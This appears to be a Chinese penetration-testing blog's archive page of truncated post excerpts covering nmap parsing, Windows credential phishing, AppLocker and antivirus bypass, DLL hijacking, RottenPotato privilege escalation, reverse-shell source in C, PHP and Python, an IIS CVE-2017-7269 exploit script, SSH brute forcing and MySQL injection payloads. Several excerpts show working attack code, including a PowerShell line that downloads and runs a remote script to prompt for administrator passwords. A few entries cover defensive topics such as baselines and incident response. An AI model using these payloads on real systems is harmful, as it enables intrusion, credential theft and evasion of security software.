未分类

处理nmap生成xml

[python]#!/usr/bin/env python # coding=utf-8 import sys, time import xmltodict def main(): fp_content = '' shuchu = open('nmap.txt', 'w+') try: with open(sys.arg...

获取网站基本信息

就写了个最简单的结合 for 命令使用 #define CURL_STATICLIB //必须在包含curl.h前定义 #include <io.h> #include<iostream> #include"curl/curl.h" #include<ctime> #include&l...

钓管理员密码

post/windows/gather/phish_windows_credentials powershell.exe -ep bypass -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/...

绕过杀软执行payload

https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ //exploit/windows/misc/regsvr32_applocker_bypass_server <?XML version="1.0"?> <scriptlet> <registration ...

劫持version.dll 添加用户

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // 头文件 #include <iostream> #include <windows.h> #include ...

Meterpreter Shell 过杀软

powershell 方式查杀厉害 需要.net 4.0 环境 https://holdmybeer.xyz/2016/09/11/c-to-windows-meterpreter-in-10mins/ 推荐此种办法 (.net 2.0) https://www.blackhillsinfosec.com/?p=4881 编译...

dll 劫持

http://www.programlife.net/a-deep-insight-into-dll-hijacking-vulnerability.html https://3gstudent.github.io/3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96...

邪恶土豆提权

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ https://github.com/foxglovesec/RottenPotato http://www.freebuf.com/sectool/98316.html...

内网相关

http://www.mottoin.com/92978.html 内网渗透测试定位技术总结 http://www.mottoin.com/88117.html 后渗透阶段的信息收集 内网共享查找 https://github.com/mubix/netview 大全: https://github.com/...

基线检查

https://github.com/re4lity/Benchmarks https://learn.cisecurity.org/benchmarks https://nvd.nist.gov/ncp/repository https://github.com/iadgov/secure-host-baseline ===============================...

应急响应相关文章

1、黑客入侵应急分析手工排查 https://xianzhi.aliyun.com/forum/read/1655.html   2、Web日志安全分析浅谈 https://xianzhi.aliyun.com/forum/read/1723.html   3、应急响应分析技...

runassystem权限小工具

@echo off ver|findstr "5\.[0-9]\.[0-9][0-9]*" >NUL 2>NUL && (echo [-] Not Working for winxp\win2k3 &&goto :EOF) del /f /q %result_file% >NUL 2>NUL Rd "%WinDir%\system...

reverse shell dll 源码

#pragma comment(lib,"Ws2_32.lib") #include <WinSock2.h> #include <stdlib.h> WSADATA wsaData; SOCKET Winsock; SOCKET Sock; struct sockaddr_in hax; STARTUPINFO ini_processo; PR...

nc 反弹dll

// dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "stdafx.h" #include <winsock2.h> #include <stdlib.h> #pragma comment(lib,"ws2_32") void reverse_shell(); WSADATA wsaData;...

netcat 及其姐妹工具

转载:http://www.cnblogs.com/starspace/archive/2009/02/17/1392830.html 最喜欢netcat工具了。 一般杀毒软件会把netcat杀掉。 可以用netcat clone 工具CryptCat,支持ssh,还免杀。 查询了一下,n...

CVE-2017-7269 (iis 6 远程执行漏洞)相关脚本

特性:支持 https 支持域名 如果路径错误将自动爆破物理 回显 加入web路径 参考: [1]   https://www.t00ls.net/thread-38987-1-1.html [2] https://ht-sec.org/cve-2017-7269-vulnerabilit...

URL 采集(Google)

来源:https://evi1cg.me/archives/URL.html 作者:Evi1cg var h3 = document.getElementsByTagName('h3'); for(var i=0;i<h3.length;i++){ var a = h3[i]. getElementsByTagName('a'); console...

获取ssh登录ip位置

[bash]for i in `grep 'sshd' /var/log/auth.log* |grep 'Accepted' |grep ftp| grep -oE '\(\.\){2}\.\' | sort | uniq`; do curl -s --header "X-Forwarded-For: $i" http://1212.ip138.com/ic.asp |iconv -...

进程监控小脚本

新添加功能: 每秒刷新监控指定进程 r参数 @echo off setlocal EnableDelayedExpansion set process=%1 set Refresh=%2 ::code by lostwolf ::如果不存在 打印帮助信息 if not...

mysql dump脚本

首发于: https://www.t00ls.net/thread-25759-1-1.html 测试1000w 数据正常dump! 作者:lostwolf 平時有權限訪問數據庫目錄的話 直接下載該數據庫目錄 有權限執行命令的話 通過mysqldump 、或者into outfil...

php 反弹shell

该反弹shell 跟 nc 反弹效果是一样的 和传统php 反弹不一样的是 使用php自己的函数 传统shell 里面调用perl 该shell 仅支持linux 半交互 执行 passwd 命令可正常输入 代码来源 : http://pentestmonkey.net/to...

.net 环境下载安装

命令行安装 .net 4.0(管理员权限) dotNetFx40_Client_x86_x64.exe /q /norestart /ChainingPackage FullX64Bootstrapper /log %temp%\test.html 一些.net 环境 https://www.microsoft.com/en-us/d...

php 版iisspy

作者:dust2 文章来源:https://www.t00ls.net/viewthread.php?tid=22864 日期:2013-5-16 [html]

c sharp学习第一天,简单端口扫描器

代码来源:http://blog.csdn.net/xiaohui_hubei/article/details/7515103 [csharp] using System; using System.Text; using System.Net; using System.Net.Sockets; using System.Collections; nam...

十种MySQL报错注入

文章来源:http://www.cnblogs.com/wocalieshenmegui/p/5917967.html 以下均摘自《代码审计:企业级Web代码安全架构》一书 1.floor() [bash] select * from test where id=1 and (select 1 from (select ...

几种常见的hash加密

来源:wooyun.org 系统:DES(Unix) 例子: IvS7aeT4NzQPM 说明:Linux或者其他linux内核系统中 长度: 13 个字符 描述:第1、2位为salt,例子中的'Iv'位salt,后面的为hash值 系统:MD5(Unix...

多线程ssh 爆破脚本

来源:https://github.com/nullsecuritynet/tools/blob/master/cracker/against/release/against.py #!/usr/bin/env python # -*- coding: latin-1 -*- #####################################################...

python 反弹shell

来源:https://github.com/dairoot/Shell-rebound/blob/master/back.py http://www.mksec.net/nc.py # -*- coding:utf-8 -*- #!/usr/bin/env python """ back connect py version,only lin...